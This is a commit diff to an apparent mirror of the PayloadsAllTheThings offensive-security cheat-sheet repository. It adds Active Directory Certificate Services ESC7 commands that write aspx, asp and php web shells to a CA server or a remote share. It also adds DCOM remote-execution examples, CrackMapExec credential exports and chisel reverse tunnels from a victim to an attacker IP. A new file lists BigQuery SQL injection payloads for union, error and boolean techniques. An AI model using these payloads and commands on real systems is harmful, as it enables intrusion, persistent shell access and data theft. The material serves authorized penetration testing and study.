mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-14 00:47:20 +00:00
ADCS ESC7 Shell + Big Query SQL
This commit is contained in:
parent
4357f1e48f
commit
71dcfd5ca7
4 changed files with 114 additions and 5 deletions
|
@ -260,7 +260,12 @@ root@payload$ ./bloodhound --no-sandbox
|
||||||
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
|
||||||
```
|
```
|
||||||
|
|
||||||
You can add some custom queries like [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json) and [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json). Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
|
You can add some custom queries like :
|
||||||
|
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
|
||||||
|
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
|
||||||
|
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
|
||||||
|
|
||||||
|
Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
|
||||||
|
|
||||||
|
|
||||||
### Using PowerView
|
### Using PowerView
|
||||||
|
@ -2302,6 +2307,22 @@ Exploitation:
|
||||||
Certify.exe setconfig /removeapproval /restart
|
Certify.exe setconfig /removeapproval /restart
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Alternative exploitation from **ManageCA** to **RCE** on ADCS server:
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# Get the current CDP list. Useful to find remote writable shares:
|
||||||
|
Certify.exe writefile /ca:SERVER\ca-name /readonly
|
||||||
|
|
||||||
|
# Write an aspx shell to a local web directory:
|
||||||
|
Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx
|
||||||
|
|
||||||
|
# Write the default asp shell to a local web directory:
|
||||||
|
Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
|
||||||
|
|
||||||
|
# Write a php shell to a remote web directory:
|
||||||
|
Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
#### ESC8 - AD CS Relay Attack
|
#### ESC8 - AD CS Relay Attack
|
||||||
|
|
||||||
|
@ -2599,11 +2620,15 @@ bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F38
|
||||||
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
|
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer.
|
||||||
|
|
||||||
|
|
||||||
* Impacket DcomExec.py
|
* Impacket DCOMExec.py
|
||||||
```ps1
|
```ps1
|
||||||
dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
|
dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...]
|
||||||
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
|
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>'
|
||||||
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'
|
dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig'
|
||||||
|
|
||||||
|
python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe'
|
||||||
|
# -object MMC20 specifies that we wish to instantiate the MMC20.Application object.
|
||||||
|
# -silentcommand executes the command without attempting to retrieve the output.
|
||||||
```
|
```
|
||||||
* CheeseTools - https://github.com/klezVirus/CheeseTools
|
* CheeseTools - https://github.com/klezVirus/CheeseTools
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -3494,3 +3519,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||||
* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
|
* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
|
||||||
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
|
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
|
||||||
* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
|
* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
|
||||||
|
* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
|
||||||
|
|
|
@ -15,3 +15,13 @@ $ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only
|
||||||
$ who
|
$ who
|
||||||
$ write root pts/2 # press Ctrl+D after typing the message.
|
$ write root pts/2 # press Ctrl+D after typing the message.
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## CrackMapExec Credential Database
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
cmedb (default) > workspace create test
|
||||||
|
cmedb (test) > workspace default
|
||||||
|
cmedb (test) > proto smb
|
||||||
|
cmedb (test)(smb) > creds
|
||||||
|
cmedb (test)(smb) > export creds csv /tmp/creds
|
||||||
|
```
|
|
@ -8,7 +8,7 @@
|
||||||
* [Local Port Forwarding](#local-port-forwarding)
|
* [Local Port Forwarding](#local-port-forwarding)
|
||||||
* [Remote Port Forwarding](#remote-port-forwarding)
|
* [Remote Port Forwarding](#remote-port-forwarding)
|
||||||
* [Proxychains](#proxychains)
|
* [Proxychains](#proxychains)
|
||||||
* [Graphtcp](#graphtcp)
|
* [Graftcp](#graftcp)
|
||||||
* [Web SOCKS - reGeorg](#web-socks---regeorg)
|
* [Web SOCKS - reGeorg](#web-socks---regeorg)
|
||||||
* [Web SOCKS - pivotnacci](#web-socks---pivotnacci)
|
* [Web SOCKS - pivotnacci](#web-socks---pivotnacci)
|
||||||
* [Metasploit](#metasploit)
|
* [Metasploit](#metasploit)
|
||||||
|
@ -232,8 +232,11 @@ $ sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa"
|
||||||
go get -v github.com/jpillora/chisel
|
go get -v github.com/jpillora/chisel
|
||||||
|
|
||||||
# forward port 389 and 88 to hacker computer
|
# forward port 389 and 88 to hacker computer
|
||||||
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
|
|
||||||
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
|
user@hacker$ /opt/chisel/chisel server -p 8008 --reverse
|
||||||
|
user@victim$ .\chisel.exe client YOUR_IP:8008 R:88:127.0.0.1:88 R:389:localhost:389
|
||||||
|
|
||||||
|
# SOCKS
|
||||||
|
user@victim$ .\chisel.exe client YOUR_IP:8008 R:socks
|
||||||
```
|
```
|
||||||
|
|
||||||
### SharpChisel
|
### SharpChisel
|
||||||
|
|
70
SQL Injection/BigQuery Injection.md
Normal file
70
SQL Injection/BigQuery Injection.md
Normal file
|
@ -0,0 +1,70 @@
|
||||||
|
# Google BigQuery SQL Injection
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Detection](#detection)
|
||||||
|
* [BigQuery Comment](#bigquery-comment)
|
||||||
|
* [BigQuery Union Based](#bigquery-union-based)
|
||||||
|
* [BigQuery Error Based](#bigquery-error-based)
|
||||||
|
* [BigQuery Boolean Based](#bigquery-boolean-based)
|
||||||
|
* [BigQuery Time Based](#bigquery-time-based)
|
||||||
|
* [References](#references)
|
||||||
|
|
||||||
|
## Detection
|
||||||
|
|
||||||
|
* Use a classic single quote to trigger an error: `'`
|
||||||
|
* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# Gathering project id
|
||||||
|
select @@project_id
|
||||||
|
|
||||||
|
# Gathering all dataset names
|
||||||
|
select schema_name from INFORMATION_SCHEMA.SCHEMATA
|
||||||
|
|
||||||
|
# Gathering data from specific project id & dataset
|
||||||
|
select * from `project_id.dataset_name.table_name`
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Comment
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
select 1#from here it is not working
|
||||||
|
select 1/*between those it is not working*/
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Union Based
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
|
||||||
|
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
|
||||||
|
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
|
||||||
|
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Error Based
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# Error based - division by zero
|
||||||
|
' OR if(1/(length((select('a')))-1)=1,true,false) OR '
|
||||||
|
|
||||||
|
# Error based - casting: select CAST(@@project_id AS INT64)
|
||||||
|
dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Boolean Based
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
|
||||||
|
```
|
||||||
|
|
||||||
|
## BigQuery Time Based
|
||||||
|
|
||||||
|
* Time based functions does not exist in the BigQuery syntax.
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - Feb 14](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
|
||||||
|
* [BigQuery Documentation - Query Syntax](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
|
||||||
|
* [BigQuery Documentation - Functions and Operators](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
|
||||||
|
* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - By Duc Nguyen The, March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)
|
Loading…
Reference in a new issue